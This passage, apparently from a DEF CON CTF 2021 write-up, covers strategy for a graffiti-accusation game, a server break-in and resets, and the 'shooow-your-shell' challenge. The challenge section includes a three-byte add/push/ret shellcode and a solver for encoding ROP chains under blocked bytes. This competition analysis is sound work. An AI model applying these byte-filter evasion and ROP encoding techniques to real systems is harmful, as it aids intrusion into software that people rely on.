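                   lambda g, ip: ip == "13.37.109.64"))  # 13.37.109.64
</code></pre>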

<p>During the game, I had a really evil thought: what if we told other teams the real IP address behind each jump server, so they could help accuse the big teams and take them down? Maybe I could post it in the Discord chat or spray it onto other teams’ walls. However, that would probably violate some rule, or at least not be very ethical, and it didn’t sound like the right thing to do, so we didn’t do it.</p>

<h3 id="the-avoidance">The Avoidance</h3>

<p>After a while, we saw that our points no longer grew as rapidly, so some teams must have started to see through our fake IP address and accuse us using our real one. Using the rule that you can only accuse graffiti sprayed on your own team’s wall, we had two ideas:</p>

<ol>
  <li>
    <p>Spray only a random subset of all the teams and record which teams we sprayed. We could then check our scores to figure out which teams we should stop spraying.</p>
  </li>
  <li>
    <p>Stop spraying only the big players we had identified, since they were also the most likely to have found our real IP.</p>
  </li>
</ol>

<p>The first idea seemed good, but was really hard to implement. First of all, the scoreboard lagged behind, so in reality we would have to wait many rounds to get the data we needed. Furthermore, the data was really noisy, so we would need to repeat this for many rounds to be sure. Therefore, I didn’t go with it.</p>

<p>Instead, for the second idea, since we had already identified some of the big players, we could simply stop spraying them and quickly check whether we indeed got more points. We picked the two largest teams (the ones that owned the most jump servers), whose real IPs were <code class="language-plaintext highlighter-rouge">13.37.109.64</code> and <code class="language-plaintext highlighter-rouge">13.37.238.64</code>, and stopped spraying them.</p>

<p>At first it didn’t seem to work, but once the scoreboard caught up to the round where we implemented this idea, we saw our score increase drastically, and our per-round gain then surpassed PPP’s and Katzebin’s.</p>

<h3 id="the-countermeasure">The Countermeasure</h3>

<p>After a while, we realized that the big teams had stopped attacking us as well, probably following the same thought process. However, there is actually a way to counter that. Let’s first review what we knew:</p>

<p>To successfully accuse some team, we needed to present an (<code class="language-plaintext highlighter-rouge">IP</code>, <code class="language-plaintext highlighter-rouge">graffiti</code>) pair, with the restrictions that</p>

<ol>
  <li>The <code class="language-plaintext highlighter-rouge">IP</code> was the real address of the <em>WWW</em> game box owned by the team that exchanged this <code class="language-plaintext highlighter-rouge">graffiti</code>.</li>
  <li>That <code class="language-plaintext highlighter-rouge">graffiti</code> was sprayed onto our wall.</li>
</ol>

<p>If people stop spraying us, then clearly we couldn’t do anything about it, right?</p>

<p>Notice, however, that we could see other teams’ walls as well. Even if some team didn’t spray us in a given round, it would spray someone else, and its graffiti would be left there for anyone to see.</p>

<p>Then one of our team members had a crazy thought: we could take the graffiti a team had sprayed on other teams’ walls and spray it onto our own wall. This idea had two implications:</p>

<ol>
  <li>This had to count as a point for that team, because the system had no way to tell whether we had sprayed it onto our own wall or the other team had taken control of our machine and sprayed it there.</li>
  <li>Since 1 had to work, we could then definitely accuse that team successfully, because the pair satisfies both restrictions above.</li>
</ol>
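<p>The bookkeeping for this trick could look like the sketch below. The wall log format (a mapping from wall IP to (graffiti, source IP) pairs) and the <code class="language-plaintext highlighter-rouge">owner_of</code> table mapping source IPs to real IPs are hypothetical; in practice, the mapping would come from the jump server analysis. Each returned pair is a graffiti to spray onto our own wall, followed by the real IP to accuse it with.</p>

<pre><code class="language-python">def replay_targets(walls, our_ip, owner_of):
    """Pick graffiti left on *other* teams' walls that we can attribute.

    walls:    {wall_ip: [(graffiti, source_ip), ...]}  (hypothetical format)
    owner_of: {source_ip: real_ip} for sources we have already resolved
    Returns [(graffiti, real_ip)]: spray each graffiti onto our own wall,
    then accuse it using real_ip.
    """
    picks = []
    for wall_ip, entries in walls.items():
        if wall_ip == our_ip:
            continue  # graffiti already on our wall can be accused directly
        for graffiti, source_ip in entries:
            real_ip = owner_of.get(source_ip)
            if real_ip is not None and real_ip != our_ip:
                picks.append((graffiti, real_ip))
    return picks


ours = "13.37.228.64"
walls = {
    "13.37.1.64": [("g1", "10.0.0.5"), ("g2", "10.0.0.9")],
    ours: [("g3", "10.0.0.5")],
    "13.37.2.64": [("g4", ours)],
}
print(replay_targets(walls, ours, {"10.0.0.5": "13.37.109.64", ours: ours}))
# [('g1', '13.37.109.64')]
</code></pre>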

<p>We quickly tested whether this really worked, and it did. Hence, for teams that didn’t want to get accused, the best option was probably to stop spraying altogether. In the final hours of the game, both PPP and Katzebin stopped spraying, and we were the only team whose score was still growing.</p>

<h2 id="the-reset">The Reset</h2>

<p>At one point in the game, we suddenly lost all connections to the game box. At first we thought it was just a connection issue, so we waited a bit, but it didn’t come back on its own. I started to panic, because all of the saved flags were stored on the box, and we had to at least get that file back before resetting the machine. So we sent out a ticket, hoping the admins could help us sort out the issue.</p>

<p>However, almost 10 minutes after we lost the connection, there was still no progress on the matter, and we couldn’t afford to lose more points. We had accumulated about 40 flags by then, and a reset meant starting from zero.</p>

<p>Just as we were agonizing over whether to wait for the admins or just reset the machine, one of our team members found the contents of the flags file in his terminal history: a <code class="language-plaintext highlighter-rouge">cat /flags</code> command that might just save us. After checking it, we confirmed that it was relatively recent and contained enough flags to get us back to where we were. We backed up that content and immediately reset our machine.</p>

<p>But that’s not the end.</p>

<h3 id="the-second-reset">The Second Reset</h3>

<p>When we first lost connection to the server, we kind of suspected that another team had hacked our box, but we didn’t know for sure. We knew there were weak SSH password issues, but we weren’t able to log into anyone’s machine using the weak password, and we had changed our own SSH password from the beginning.</p>

<p>However, not long after we reset our machine, we were suddenly kicked out of the server again. This time, it wasn’t that we couldn’t connect to the SSH port; the SSH server kept telling us our password was wrong. We were sure we had been hacked, and that was really scary.</p>

<p>We quickly reset our machine again, and the moment we logged in, we not only changed all users’ passwords (including the main one) but also disabled the Apache server. This might make us fail the service availability check, but that only cost 15 points per round, far less than what we were scoring.</p>

<p>After that, our connection was fine, and that’s the end of this brief interlude.</p>

<h2 id="the-end">The End</h2>

<p>An hour before day two ended, almost everyone’s score stopped increasing, except for ours. In the end, we even climbed to second place, only 2000 points behind PPP. I would say that’s impressive, considering we didn’t pwn any server at all.</p>

<p>There was also a stretch of the game where, for some reason, nobody scored. I think the <code class="language-plaintext highlighter-rouge">/graffiti_store</code> endpoint was down, but I don’t think it was down for that long. It remains a mystery.</p>

<h1 id="shooow-your-shell">shooow-your-shell</h1>

<p><img src="/assets/images/defcon-ctf-2021/shooow-your-shell-score.png" alt="shooow-your-shell-score" /></p>

<p>After day two ended, a KoH “homework” challenge was released. It was named <code class="language-plaintext highlighter-rouge">shooow-your-shell</code>, and as the name suggests, it was yet another shellcode challenge. Nine hours before day three started, we began working on it.</p>

<p>Looking at the Python code and disassembled runner, we understood how the game worked:</p>

<ul>
  <li>
    <p>Each time, a team can submit a hex-encoded shellcode, written for the <code class="language-plaintext highlighter-rouge">x86_64</code>, <code class="language-plaintext highlighter-rouge">arm64</code>, or <code class="language-plaintext highlighter-rouge">riscv64</code> architecture.</p>
  </li>
  <li>
    <p>The game runs the shellcode on all three architectures each time, and if any run reads the content of <code class="language-plaintext highlighter-rouge">/secret</code> and prints it to <code class="language-plaintext highlighter-rouge">stdout</code>, the submission is deemed a success.</p>
  </li>
  <li>
    <p>The shellcode is executed using <code class="language-plaintext highlighter-rouge">qemu-user-static</code>, <code class="language-plaintext highlighter-rouge">chroot</code>ed into a temporary folder, and run with non-root user privileges.</p>
  </li>
  <li>
    <p>However, there are some restrictions about the shellcode a team can submit:</p>

    <ul>
      <li>
        <p>At any time of the game, there would be a set of blocked bytes \(B\subseteq \{\texttt{0x00},\texttt{0x01},\cdots,\texttt{0xFF}\}\). The submitted shellcode cannot contain any of the blocked bytes.</p>
      </li>
      <li>
        <p>Compared to the last accepted submission \(S_l\), the new shellcode \(S_n\) must satisfy either:</p>

        <ul>
          <li>\(\{S_l\dots\} \setminus \{S_n\dots\} \neq \varnothing\) (the new shellcode did not use at least one byte the last accepted shellcode used), or</li>
          <li>\(\vert S_l\vert  &gt; \vert S_n\vert\) (the new shellcode is shorter than the last accepted shellcode in length).</li>
        </ul>

        <p>Where \(S_l\) and \(S_n\) are both strings of shellcodes, and \(\{S\dots\}\) is a set containing bytes used in a shellcode \(S\).</p>
      </li>
    </ul>
  </li>
  <li>
    <p>If the shellcode is then accepted, the new set of blocked bytes will be \(B_n = B \cup \left(\{S_l\dots\} \setminus \{S_n\dots\}\right)\). That is, all bytes used by the old shellcode but not by the new one become blocked.</p>
  </li>
  <li>
    <p>The team with the latest accepted shellcode is viewed as “the top of the hill,” and a team cannot submit more shellcode while it is on top of the hill.</p>
  </li>
  <li>
    <p>The newly accepted shellcode is then appended to <code class="language-plaintext highlighter-rouge">history</code>, and the leaderboard is <code class="language-plaintext highlighter-rouge">history</code> in reverse order. That is, the team with the latest accepted shellcode is #1, the team that held the top of the hill before them is #2, and so on.</p>
  </li>
  <li>
    <p>On each run, the Python script reads past information from <code class="language-plaintext highlighter-rouge">history</code> and writes to it if the shellcode is accepted.</p>
  </li>
  <li>
    <p>If a team stayed on the top of the hill for more than 900 seconds (or 15 minutes), then that team would be regarded as a “winner,” and the game would reset. However, one random byte of the winner’s shellcode would be part of the new game’s initial banned bytes \(B\). This applied to all past winners.</p>
  </li>
</ul>
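<p>To double-check our reading of the rules, here is a small sketch of the acceptance check and the blocked-byte update. It reflects our interpretation of the rules above, not the organizers’ code; <code class="language-plaintext highlighter-rouge">accept</code> is a hypothetical name, and shellcode is modeled as Python <code class="language-plaintext highlighter-rouge">bytes</code>.</p>

<pre><code class="language-python">import operator


def accept(new, last, blocked):
    """Return the updated blocked-byte set if `new` is acceptable, else None.

    new, last: the new and last accepted shellcode, as bytes.
    blocked:   set of currently blocked byte values (B).
    """
    used_new = set(new)
    if not used_new.isdisjoint(blocked):
        return None  # contains a blocked byte
    dropped = set(last) - used_new  # bytes in S_l that S_n no longer uses
    shorter = operator.lt(len(new), len(last))  # is S_n shorter than S_l?
    if not dropped and not shorter:
        return None  # neither drops a byte nor is shorter
    return blocked | dropped  # B_n = B union ({S_l} minus {S_n})


print(accept(bytes.fromhex("0505050550"), bytes.fromhex("05c3c3c3c350c3"), set()))
# {195}
</code></pre>

<p>Note that a shorter shellcode using exactly the same bytes is accepted without blocking anything new.</p>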

<p>The rules are pretty clear, but we also had some doubts:</p>

<ul>
  <li>The <code class="language-plaintext highlighter-rouge">history</code> file was read at the start of the script and overwritten when the new <code class="language-plaintext highlighter-rouge">history</code> was saved, so there was clearly a race condition: open two connections \(A\) and \(B\) at the same time, and submit an acceptable shellcode to \(A\) so that <code class="language-plaintext highlighter-rouge">history</code> is overwritten. Because the script reads <code class="language-plaintext highlighter-rouge">history</code> only at the start, \(B\) still sees the old <code class="language-plaintext highlighter-rouge">history</code> (from when the connection opened), and may accept a shellcode that is not acceptable under the current <code class="language-plaintext highlighter-rouge">history</code>. If we then submit a shellcode to \(B\) and it is accepted, \(B\)’s connection overwrites <code class="language-plaintext highlighter-rouge">history</code> again as if \(A\) never happened.</li>
  <li>There had to be a way to sync up the files between each team’s boxes, or everyone would be seeing their own version of <code class="language-plaintext highlighter-rouge">history</code> and the game would be pointless. It was also possible that everyone was playing on the same server, but according to @riatre that was highly unlikely.</li>
</ul>
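<p>The first doubt is easiest to see in a toy model. The <code class="language-plaintext highlighter-rouge">Connection</code> class below is hypothetical and only mimics the behavior we inferred: <code class="language-plaintext highlighter-rouge">history</code> is snapshotted when a connection opens and written back wholesale when a submission is accepted. The acceptance check itself is left out.</p>

<pre><code class="language-python">class Connection:
    """Toy model of one connection to the KoH service."""

    def __init__(self, store):
        self.store = store
        self.history = list(store["history"])  # snapshot at connect time

    def submit(self, team):
        # Acceptance is checked against self.history (omitted here).
        self.history.append(team)
        self.store["history"] = self.history  # overwrite: no merge, no lock


store = {"history": ["PPP"]}
a = Connection(store)
b = Connection(store)   # opened before A submits
a.submit("A")
b.submit("B")           # B never saw A's submission
print(store["history"])  # ['PPP', 'B']
</code></pre>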

<p>But there was no way to know before the game started, so we went on with our preparation.</p>

<h2 id="preparation">Preparation</h2>

<p>We started by writing a few different shellcodes: some used syscalls directly, some called functions statically linked into the binary, and some pushed a ROP chain onto the stack and returned. Nothing out of the ordinary here.</p>

<h3 id="three-byte-shellcode">Three-Byte Shellcode</h3>

<p>That is, until @meowmere sent a shellcode that blew all of us away. His shellcode used only 3 distinct bytes: <samp>0x05</samp>, <samp>0x50</samp>, and <samp>0xc3</samp>. We quickly disassembled it and understood how it worked:</p>

<p>The shellcode simply pushed a ROP chain onto the stack and returned, but it was written so that every value was built up by additions in a register. Therefore, only three instructions were used:</p>

<ul>
  <li><code class="language-plaintext highlighter-rouge">add eax, imm32</code>, which is <samp>0x05</samp> followed by the 4-byte little-endian immediate value,</li>
  <li><code class="language-plaintext highlighter-rouge">push rax</code>, which is <samp>0x50</samp>, and</li>
  <li><code class="language-plaintext highlighter-rouge">ret</code>, which is <samp>0xc3</samp>.</li>
</ul>

<p>For the <code class="language-plaintext highlighter-rouge">add</code> instructions, the immediate values also consisted only of these 3 bytes, so the whole shellcode used just these three byte values. Of course, the values in the ROP chain contain bytes outside these 3, but amazingly, by combining numbers made up of these 3 bytes and relying on modular arithmetic (the 32-bit register simply wraps around), we can actually add them up to the number we want.</p>

<p>For example, if we want a number <samp>0xd093cffa</samp> to be pushed onto the stack, then we can have:</p>

<pre><code class="language-asm">add eax, 0xc350c305
add eax, 0xc350c305
add eax, 0xc350c350
add eax, 0xc350c350
add eax, 0xc350c350
push rax
</code></pre>

<p>And the assembled shellcode for this would consist only of the aforementioned 3 bytes. This works because</p>

\[(\text{c350c305})_{\text{hex}} \cdot 2 + (\text{c350c350})_{\text{hex}} \cdot 3 \equiv (\text{d093cffa})_\text{hex} \mod 2^{32}\]
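<p>To check the example, a small assembler sketch can emit the three instructions byte by byte and track <code class="language-plaintext highlighter-rouge">eax</code>. It assumes <code class="language-plaintext highlighter-rouge">eax</code> starts at 0 and uses the standard encodings (<samp>0x05</samp> followed by a little-endian imm32, <samp>0x50</samp>, <samp>0xc3</samp>). In 64-bit mode, a 32-bit <code class="language-plaintext highlighter-rouge">add</code> zero-extends into <code class="language-plaintext highlighter-rouge">rax</code>, so <code class="language-plaintext highlighter-rouge">push rax</code> pushes the value of <code class="language-plaintext highlighter-rouge">eax</code>. <code class="language-plaintext highlighter-rouge">assemble</code> is a hypothetical helper.</p>

<pre><code class="language-python">ADD_EAX = 0x05   # add eax, imm32
PUSH_RAX = 0x50  # push rax
RET = 0xC3       # ret

MOD = 2 ** 32


def assemble(groups):
    """For each group of imm32 values, add them all to eax, then push rax.
    Finish with ret. Returns (code bytes, list of pushed values)."""
    code = bytearray()
    eax = 0  # assumption: eax starts at 0
    pushed = []
    for imms in groups:
        for imm in imms:
            code.append(ADD_EAX)
            code += imm.to_bytes(4, "little")
            eax = (eax + imm) % MOD  # 32-bit wraparound
        code.append(PUSH_RAX)
        pushed.append(eax)
    code.append(RET)
    return bytes(code), pushed


code, pushed = assemble([[0xC350C305] * 2 + [0xC350C350] * 3])
print(hex(pushed[0]))                           # 0xd093cffa
print(sorted(set(code)) == [0x05, 0x50, 0xC3])  # True
</code></pre>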

<p>I’m not good at number theory, so I can’t tell whether sums of 32-bit numbers built from these 3 bytes can reach every value in the 32-bit range mod \(2^{32}\). That said, the example above shows they can reach at least some targets, so it’s time for some math.</p>
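<p>As a side note, reachability alone turns out to be easy to settle. An odd number is invertible modulo \(2^{32}\), and <samp>0x05050505</samp> is odd, so adding it \(k = T\cdot u^{-1} \bmod 2^{32}\) times (with \(u\) = <samp>0x05050505</samp>) reaches any target \(T\). The catch is that \(k\) is usually far too large to be practical, which is why the real question is finding a <em>short</em> combination. The sketch uses the three-argument <code class="language-plaintext highlighter-rouge">pow</code> with exponent <code class="language-plaintext highlighter-rouge">-1</code> (Python 3.8+) for the modular inverse.</p>

<pre><code class="language-python">MOD = 2 ** 32
U = 0x05050505  # odd, so it has a multiplicative inverse mod 2**32


def repeats_needed(target):
    """k such that k * U == target (mod 2**32)."""
    return target * pow(U, -1, MOD) % MOD


k = repeats_needed(0xD093CFFA)
assert k * U % MOD == 0xD093CFFA
print(k)  # a valid repeat count, but usually far too many instructions
</code></pre>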

<h4 id="find-values-that-adds-up-to-the-target-one">Find Values that Add Up to the Target One</h4>

<p>We have an alphabet \(A\) that consists of numbers from \([0,\vert A \vert)\), a set of usable symbols \(B \subseteq A\), and a target string \(T\) of length \(s\). We represent \(T\) as a base-\(\vert A\vert\) number, that is, \(T = \sum_{i=0}^{s-1} {\vert A\vert }^{i} T_i\).</p>

<p>We want to find a list of numbers \([n_1, n_2, \cdots, n_i]\) such that \(T \equiv \sum_i n_i \mod \vert A\vert ^s\) and \(n_i=\sum_{j=0}^{s-1} \vert A\vert ^{j}\cdot n_{ij}, n_{ij} \in B\), i.e. \(n_i\) consists only of symbols from \(B\) in its base-\(\vert A\vert\) representation as a string.</p>

<p>Although it is possible to generate all possible values of \(n_i\) (a set of size \(\vert B\vert ^s\)), it is very hard to find a combination of them that adds up to \(T\). With breadth-first search, at search depth \(d\) there are \(O\left(\vert B\vert ^{sd}\right)\) candidate combinations, while there are \(\vert A\vert ^s\) possible sums and only a few of the combinations hit \(T\). Therefore, we need a way to search for these values quickly.</p>

<p>We have</p>

\[\begin{align}
T &amp;\equiv \sum_i n_i &amp;\mod |A|^s\\
&amp;\equiv \sum_i\sum_{j=0}^{s-1} |A|^j\cdot n_{ij} &amp;\mod |A|^s\\
&amp;\equiv \sum_{j=0}^{s-1} \left(|A|^j \cdot \sum_{k=1}^{|B|} b_k  c_{jk} \right)&amp;\mod |A|^s&amp;&amp; \text{where }c_{jk} = \sum_i[n_{ij} = b_k]\\
\end{align}\]

<p>where \(n_{ij}\) is the \(j\)-th symbol of string \(n_i\), \(b_k\) is the \(k\)-th symbol of \(B\), and \([\cdot]\) is the Iverson bracket. A constraint we must add is</p>

\[\exists i \in \mathbb{Z}^+, \forall j \in [0, s), \sum_{k=1}^{|B|} c_{jk} = i\]

<p>That is, every position of the string must hold the same number of symbols; otherwise, we would have to pad some numbers with \(0\), which might not be in \(B\). To find the optimal answer (the one producing the shortest list of \(n_i\)), we just need to find the minimum such \(i\). It is also easy to see that \(i\) has an upper bound of \(\vert A\vert \cdot \vert B\vert\), since each symbol at each position needs to appear at most \(\vert A\vert\) times.</p>

<p>Notice that we represented \(T\) as a number, that is:</p>

\[T =\sum_{j=0}^{s-1}|A|^j \cdot T_j \equiv\sum_{j=0}^{s-1} \left(|A|^j \cdot \sum_{k=1}^{|B|} b_k  c_{jk} \right)\mod |A|^s\]

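<p>where \(T_j \in A\). Since \(T_j = \left\lfloor T/\vert A\vert^j\right\rfloor \bmod \vert A\vert\), carries from lower positions propagate upward, so we have</p>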

\[\begin{align}
T_0 &amp;\equiv\sum_{k=1}^{|B|} b_k  c_{0k} &amp;\mod |A|\\
T_1 &amp;\equiv \sum_{k=1}^{|B|} b_k  c_{1k} + \left\lfloor\frac{\sum_{k=1}^{|B|} b_k  c_{0k}}{|A|}\right\rfloor&amp;\mod |A|\\
T_2 &amp;\equiv \sum_{k=1}^{|B|} b_k  c_{2k} + \left\lfloor\frac{\sum_{k=1}^{|B|} b_k  c_{1k} + \left\lfloor\frac{\sum_{k=1}^{|B|} b_k  c_{0k}}{|A|}\right\rfloor}{|A|} \right\rfloor&amp;\mod |A|\\
\dots\\
T_d &amp;\equiv \left\lfloor \sum_{p=0}^{d} \frac{\sum_{k=1}^{|B|} b_k  c_{pk}}{|A|^{d-p}} \right\rfloor &amp;\mod |A|
\end{align}\]

<p>Now we have turned the task from brute-forcing a list of \(n_i\) into brute-forcing the counts \(c_{jk}\). For each symbol of \(T\), there are at most \(\vert A\vert ^{\vert B\vert }\) different combinations of \(\sum_{k=1}^{\vert B\vert } b_k  c_{jk} \mod \vert A\vert\), and assuming they are distributed evenly over the range, there are \(\approx \vert A\vert ^{\vert B\vert -1}\) ways for them to sum to any specific symbol, which makes the search space much more manageable when \(\vert B\vert\) is small. Furthermore, we can cache the value of \(\sum_{k=1}^{\vert B\vert } b_k  c_{jk} \mod \vert A\vert\) for every combination, so that we can quickly look up combinations in reverse. The overall search complexity is \(O\left(s\cdot\vert A\vert ^{\vert B\vert -1}\right)\) (a very loose bound).</p>
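<p>The cache described above can be built as a lookup table from residue to count vectors. This is a sketch of the idea rather than the author’s code, and <code class="language-plaintext highlighter-rouge">residue_table</code> is a hypothetical name. For the <samp>0x05</samp>/<samp>0x50</samp>/<samp>0xc3</samp> example with \(i = 5\), the lowest byte <samp>0xfa</samp> of <samp>0xd093cffa</samp> is reachable only as two <samp>0x05</samp>s and three <samp>0x50</samp>s, which matches the earlier example.</p>

<pre><code class="language-python">from collections import defaultdict
from itertools import product


def residue_table(symbols, i, base=256):
    """Group every count vector (c_1, ..., c_|B|) with sum i by the residue
    of sum_k b_k * c_k modulo base, so a target digit can be looked up."""
    table = defaultdict(list)
    for counts in product(range(i + 1), repeat=len(symbols)):
        if sum(counts) != i:
            continue
        dot = sum(c * b for c, b in zip(counts, symbols))
        table[dot % base].append(counts)
    return table


table = residue_table([0x05, 0x50, 0xC3], 5)
print(table[0xFA])  # [(2, 3, 0)]
</code></pre>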

<p>The pseudocode for the above procedure, without optimization:</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">input</span> <span class="n">Target</span><span class="p">,</span> <span class="n">UsableSymbols</span><span class="p">,</span> <span class="n">Alphabet</span>
<span class="n">a</span> <span class="p">:</span><span class="o">=</span> <span class="nf">size</span><span class="p">(</span><span class="n">Alphabet</span><span class="p">)</span>
<span class="n">b</span> <span class="p">:</span><span class="o">=</span> <span class="nf">size</span><span class="p">(</span><span class="n">UsableSymbols</span><span class="p">)</span>

<span class="k">def</span> <span class="nf">Search</span><span class="p">(</span><span class="n">T</span><span class="p">,</span> <span class="n">i</span><span class="p">,</span> <span class="n">depth</span><span class="p">,</span> <span class="n">path</span><span class="p">)</span>
  <span class="k">if</span> <span class="n">depth</span> <span class="o">==</span> <span class="nf">length</span><span class="p">(</span><span class="n">Target</span><span class="p">)</span>
    <span class="k">return</span> <span class="n">path</span>
  <span class="n">end</span>
  <span class="k">for</span> <span class="nf">each </span><span class="p">(</span><span class="n">c_1</span><span class="p">,</span> <span class="n">c_2</span><span class="p">,</span> <span class="p">...,</span> <span class="n">c_b</span><span class="p">)</span> <span class="n">such</span> <span class="n">that</span>
      <span class="nf">sum</span><span class="p">(</span><span class="n">c_1</span><span class="p">,</span> <span class="p">...)</span> <span class="o">==</span> <span class="n">i</span> <span class="ow">and</span>
      <span class="p">({</span><span class="n">c_1</span><span class="p">,</span> <span class="p">...}</span> <span class="o">&lt;</span><span class="n">dot</span> <span class="n">product</span><span class="o">&gt;</span> <span class="n">UsableSymbols</span><span class="p">)</span> <span class="n">mod</span> <span class="n">a</span> <span class="o">==</span> <span class="n">T</span> <span class="n">mod</span> <span class="n">a</span>
    <span class="n">answer</span> <span class="p">:</span><span class="o">=</span> <span class="nc">Search</span><span class="p">((</span><span class="n">T</span> <span class="o">-</span> <span class="p">{</span><span class="n">c_1</span><span class="p">,</span> <span class="p">...}</span> <span class="n">dot</span> <span class="n">UsableSymbols</span><span class="p">)</span> <span class="o">/</span> <span class="n">a</span><span class="p">,</span> <span class="n">i</span><span class="p">,</span> <span class="n">depth</span> <span class="o">+</span> <span class="mi">1</span><span class="p">,</span> <span class="nf">append</span><span class="p">(</span><span class="n">path</span><span class="p">,</span> <span class="p">(</span><span class="n">c_1</span><span class="p">,</span> <span class="p">...)))</span>
    <span class="k">return</span> <span class="n">answer</span> <span class="k">if</span> <span class="ow">not</span> <span class="n">nil</span>
  <span class="n">end</span>
  <span class="k">return</span> <span class="n">nil</span>
<span class="n">end</span>

<span class="k">for</span> <span class="n">i</span> <span class="k">from</span> <span class="mi">1</span> <span class="n">to</span> <span class="n">a</span> <span class="o">*</span> <span class="n">b</span>
  <span class="n">answer</span> <span class="o">=</span> <span class="nc">Search</span><span class="p">(</span><span class="n">Target</span><span class="p">,</span> <span class="n">i</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="p">[])</span>
  <span class="k">return</span> <span class="n">answer</span> <span class="k">if</span> <span class="ow">not</span> <span class="n">nil</span>
<span class="n">end</span>
<span class="n">output</span> <span class="sh">"</span><span class="s">no answer</span><span class="sh">"</span>
</code></pre></div></div>

<p>In this specific case, our alphabet is the set of possible byte values, i.e. <samp>0x00</samp>, <samp>0x01</samp>, …, <samp>0xff</samp>, so 256 of them. Our usable symbols depend on which operations we need. In this case of <code class="language-plaintext highlighter-rouge">add eax</code>, <code class="language-plaintext highlighter-rouge">push rax</code>, and <code class="language-plaintext highlighter-rouge">ret</code>, our usable bytes are <samp>0x05</samp>, <samp>0x50</samp>, and <samp>0xc3</samp> respectively. Therefore, given a number \(T\) within the range of \(2^{32} = 256^4\), this algorithm finds a minimal list of numbers that sum to the target number and contain only <samp>0x05</samp>, <samp>0x50</samp>, and <samp>0xc3</samp> in their 4-byte hex representation. Let \(f(T)\) denote the optimal (minimal) size of such a list for a given \(T\).</p>

<p>Here’s my script for <a href="https://gist.github.com/superfashi/9d1ccea3513b7f52951d7b88da052855">adding values consisting of limited bytes to reach a target number using modular arithmetic (github.com)</a>.</p>
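<p>As a rough illustration only (this is not the code from the gist), here is a minimal Python sketch of \(f\). It tries list sizes \(k = 0, 1, 2, \ldots\) in order and, for each \(k\), fills the four byte columns from least to most significant while tracking the carry, so the first \(k\) that succeeds is minimal. The names <code class="language-plaintext highlighter-rouge">ALLOWED</code>, <code class="language-plaintext highlighter-rouge">solve</code>, <code class="language-plaintext highlighter-rouge">f</code> and the cap <code class="language-plaintext highlighter-rouge">limit=64</code> are assumptions made for this example.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code>from functools import lru_cache

ALLOWED = (0x05, 0x50, 0xC3)  # bytes of add eax, imm32 / push rax / ret
WIDTH = 4                     # bytes per immediate (s = 4)
MOD = 256 ** WIDTH            # |A| ** s = 2 ** 32


def column_counts(k):
    """Every multiset of k allowed bytes, as counts of (0x05, 0x50, 0xC3)."""
    for a in range(k + 1):
        for b in range(k + 1 - a):
            yield (a, b, k - a - b)


def solve(target, k):
    """Find k words built only from ALLOWED bytes that sum to target mod MOD."""
    digits = [(target // 256 ** p) % 256 for p in range(WIDTH)]

    @lru_cache(maxsize=None)
    def search(pos, carry):
        if pos == WIDTH:
            return ()  # a carry out of the top byte wraps away (mod 2 ** 32)
        for counts in column_counts(k):
            total = carry + sum(n * byte for n, byte in zip(counts, ALLOWED))
            if total % 256 == digits[pos]:
                rest = search(pos + 1, total // 256)
                if rest is not None:
                    return (counts,) + rest
        return None

    columns = search(0, 0)
    if columns is None:
        return None
    # Any assignment of a column's bytes to the k words gives the same sum.
    words = [0] * k
    for pos, counts in enumerate(columns):
        column = [byte for n, byte in zip(counts, ALLOWED) for _ in range(n)]
        for i, byte in enumerate(column):
            words[i] += byte * 256 ** pos
    return words


def f(target, limit=64):
    """Smallest list of ALLOWED-byte words summing to target; None past limit."""
    target %= MOD
    for k in range(limit + 1):
        words = solve(target, k)
        if words is not None:
            return words
    return None
</code></pre></div></div>

<p>For example, <code class="language-plaintext highlighter-rouge">f(0x0A0A0A0A)</code> returns two copies of <code class="language-plaintext highlighter-rouge">0x05050505</code>, since no single allowed byte equals <samp>0x0a</samp> but <samp>0x05</samp> + <samp>0x05</samp> does. The column-by-column search is valid because addition works column-wise with carries: once the multiset of bytes in each column is fixed, how those bytes are spread across the words does not change the total.</p>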

<h4 id="construct-an-addpush-rop-chain">Construct an ADD/PUSH ROP Chain</h4>

<p>For a normal hand-written ROP chain, the values on the stack are fixed. However, a binary executable can contain multiple occurrences of the same instruction sequence, like <code class="language-plaintext highlighter-rouge">pop rax; ret</code> or <code class="language-plaintext highlighter-rouge">mov dword ptr [rdi], edx; ret</code>. Any of the addresses that contain the wanted instructions works equally well in a ROP chain, but since our goal now is to minimize the length of the converted ROP chain, we can look for the combination of values that produces the shortest ROP chain after converting it to the <code class="language-plaintext highlighter-rouge">add/push</code> format.</p>

<p>Notice that the current <code class="language-plaintext highlighter-rouge">rax</code> value depends on the previously pushed value. For example, our shellcode looks like this:</p>

<pre><code class="language-asm"># rax = 0
add eax, 0x50505050
add eax, 0x50505050
...
push rax # rax = v1
...      # somehow add v2 - v1 to rax
push rax # rax = v2
</code></pre>

<p>The <code class="language-plaintext highlighter-rouge">add</code> operations between the first <code class="language-plaintext highlighter-rouge">push</code> and the second <code class="language-plaintext highlighter-rouge">push</code> depend on both \(v_1\) and \(v_2\). Let’s make this more formal:</p>

<p>Given a ROP chain of \(n\) values that need to be pushed onto the stack, we have a list of sets \(N = \left[V_1, V_2, \cdots, V_n\right]\), where \(V_i\) is the set of values that are interchangeable at position \(i\): no matter which one is pushed onto the stack, the ROP chain has the same effect. We want to find a solution \((v_1, v_2, \cdots, v_n) \in V_1 \times V_2 \times \cdots \times V_n\) such that</p>

\[\sum_{i=1}^n f\left(v_i - v_{i-1} \mod |A|^s\right)\]

<p>is minimal, where \(v_0\) is the initial <code class="language-plaintext highlighter-rouge">rax</code> value, \(|A| = 256\) is the size of the alphabet, and \(s = 4\) is the number of bytes per value. A brute-force search over every possible tuple is not ideal, since it requires \(\prod_{i=1}^n \vert V_i\vert\) tries. A greedy approach that minimizes \(f\left(v_i - v_{i-1} \mod \vert A\vert ^s\right)\) one \(i\) at a time is not optimal either, since a cheap choice now can force an expensive step later. It’s time for dynamic programming, then.</p>

<p>Let \(F_i(v)\) be the minimal number of <code class="language-plaintext highlighter-rouge">add</code> instructions needed for the first \(i\) values when the \(i\)th value on the stack is \(v\). Starting from \(F_1(v) = f\left(v - v_0 \mod |A|^s\right)\), we have</p>

\[\begin{align}
F_{i+1}(v) &amp;= 
\min_{(v_1, \cdots, v_i) \in V_1 \times \cdots \times V_i} 
\left( f\left(v -v_{i} \mod |A|^s\right) +  \sum_{j=1}^{i} f\left(v_{j} - v_{j-1} \mod |A|^s\right)\right)\\
